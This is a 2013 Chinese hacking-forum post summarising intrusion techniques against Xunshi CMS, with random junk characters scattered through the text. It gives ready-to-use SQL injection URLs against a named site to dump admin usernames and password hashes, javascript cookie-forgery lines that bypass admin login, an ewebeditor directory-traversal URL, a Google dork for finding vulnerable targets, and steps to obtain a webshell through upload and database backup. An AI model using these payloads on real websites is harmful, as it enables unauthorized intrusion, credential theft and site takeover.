找回密码
 立即注册
查看: 2814|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘5 J) A3 u7 O, Q# F& B

. N& u) x7 ?0 H/ k5 u0 W, }. t在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
& ^2 g: _. I# O8 Q& R' W8 t& }0 @- l
/ P4 p& a: ^( [" V0 F4 _- g以下本文总结来自黑防去年第9期杂志上的内容...1 F. I7 c* S/ w% Y9 |

: V% k5 z1 |( t8 w先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
/ n& u2 y4 a  [; ^' ]/ z; V/ ]' v- p' [' O
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
3 f+ y' \) X% S' ?
$ R4 c; f2 @8 U. A8 [记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况1 F  [  ^: l" o
这里一个注入
% X: O( U* [, L* _9 p) H0 V" T. C, M( V. b# E
效果如图:/ f& s# J2 B& r2 k  f

3 _3 D$ `* h, p& D( W1 z
) _+ s1 s8 @  O) z, \
5 M' |7 @" h  e这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.) M  B' X2 W5 _& ?- m" j

) f' J* h7 r: c) Q3 l密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去) X, K! Q; S& d! x) p

* o! f; {& P# Y+ |" \% O3 [( zjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
8 s# b% |7 r, K' p6 ^# W8 B2 {- L  ]2 Y. Q. [4 ]5 h: M0 J
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:8 N" P9 C6 X  B/ \" h

$ S: \' P/ \* K. A因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
* f8 L) Z" ~0 d( q$ u$ y1 W; I* k0 u5 J% I) ?2 Y; F4 o
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以; I  }0 t% |1 q( g1 Z& n3 u
% p, W* B3 F  p2 L
访问这页面来列目录..步骤如下:! ?! n! j( e) `4 ~

* z6 s& {6 t& F" @javascript:alert(document.cookie="admindj=1")
  z  F( _7 F; ~) k5 C* F" ]3 a; {
6 F; R3 u: V- O! k# l3 k5 ?http://www.political-security.co ... asp?id=46&dir=../..
5 H" i  R9 l7 s
* y' j5 [/ J4 w0 E3 t" C" k' X. H9 ^4 v效果如图:" A" `5 f) `6 ^4 |. ~4 G# E2 N

0 ^7 ^1 N/ {" C$ H9 x$ J9 f& r+ G / [% l! K; a0 P  ]3 `# e. t

8 b) J! d, Z$ f+ S4 r: U7 f. i7 P- k这样全站目录都能瞧了..找到后台目录..进去..* T! c' m) W. V" l1 k/ ?

7 E& X. K5 _. T; M4 K# N6 k* k$ G那么进了后台怎么拿shell??上传--备份就ok了..
$ N( u) D: T- m# z' b4 E% F' [5 V7 \# H" {
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
# c8 o) ]5 G9 f5 X9 e9 D' {. k$ d( Z" N) q5 k6 C8 g
这个我也碰到过一次..你都可以通过列目录来实现..1 Y, ]. x1 s7 g( U

4 {3 W0 y; Q7 z' R7 g( L1 ajavascript:alert(document.cookie="admindj=1") $ J; d+ F, w0 \- s
' e) ^, V& R! j3 x: H" Z/ ^4 K
http://www.political-security.co ... p?action=BackupData 7 O! Y* Z3 [& `7 d4 k
& Q6 A) D4 K5 ]5 [9 U' j
备份ok..
5 g2 K$ Y% r+ Q
  U+ ?8 A$ l, y; `. {: K' Z. M那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?8 _1 m1 G3 t# R( A9 F+ ~

- D0 w4 b! ]$ X" X3 h在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
0 n3 s& V- F! }2 l4 J, U9 i8 w/ E, B* }. i8 g3 b
然后访问此页面进行注入..步骤如下:
( C8 d8 i; V6 o1 l' e' u4 W5 m( D2 P' a& B& C$ f% j$ Z
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")7 O, ]8 P  C! `( `2 K8 B8 a

# o, J$ Z" E4 h& l然后请求admin/admin_chk.asp页面! t% S6 u# F1 p" h+ E8 n
; W" O# U+ D4 O& ~
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
% D1 O. u. k1 T; K5 V% T# ]8 H5 ~# T2 g/ n/ S
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
; Z  H0 H9 t! j. r- a7 t3 f
5 ?1 I, B* m& p* D0 W效果如图所示:
6 u9 u) _3 p; C% v7 z/ W* ]+ J
4 p" z( r, `. S! j  Z8 H. D ' c  b. \. l. E9 u6 H

( k: q% A: N. o+ D讯时漏洞2
: J0 a: G. I9 d) z- N! |google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
1 e% Z- I' o* c0 `1 m5 `# X - U% R- X; p( D9 @
1、/admin/admin_news_pl_view.asp?id=1
- L3 {7 I0 @6 L  U9 x/ q; S//id任意 填入以下语句/ M- `6 H! G. O+ R2 ^5 M4 p9 k

1 x. V& U4 n& ^" [2 M' i. q2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
& k6 a7 r9 n  l0 C
4 m% |8 {) {8 D1 s9 i, E, F
, y8 W% v8 A! B0 s: }. A) }' i
5 j/ y7 B1 n' L' P$ s, O3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
, Z. \/ U8 T! ~7 z
# _( k/ l# _) {% a1 Z
: Y  J! o" n7 r
1 B4 L/ T6 F! Z爆出管理员帐号和密码了* k6 }8 H; r3 Q* B, `

( F4 [  ^6 |; a1 d: h/ @2 b6 b# G$ `, `1 T9 |. f: ?# Q
+ u9 F6 ^, r; N
4、cookies进后台. G& |6 M7 o7 ]3 N. J
; t( j! D2 c" V3 S, {
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));" t; {$ [, Z" \$ o

2 S/ E( d% z. H; C3 W+ ]' H5 i  J5 Z! @  Y2 Q- U+ ?. C
  L. e7 Y. Z6 _7 V/ @7 f
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!4 k& g6 @7 o/ S+ k- u
. Z* }6 p1 I* l; i9 q

- t5 P. ?6 t; y) V! ~
: ]8 E/ `# P; j6、后台有上传和备份取SHELL不难。* n7 `# M1 @2 c- O5 |5 n
- o' J' E8 Z) H+ a1 ?5 ~: r0 q
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../.., P( T7 p7 \- U; W9 p% e
; A, h- [- Y" c, N
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
6 y" h  t  U/ }/ A. n% c; G+ ~) t; ^5 J- B+ i

1 I4 ~8 q3 |. L# ?, F
! J' _3 f2 E( ]! [
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表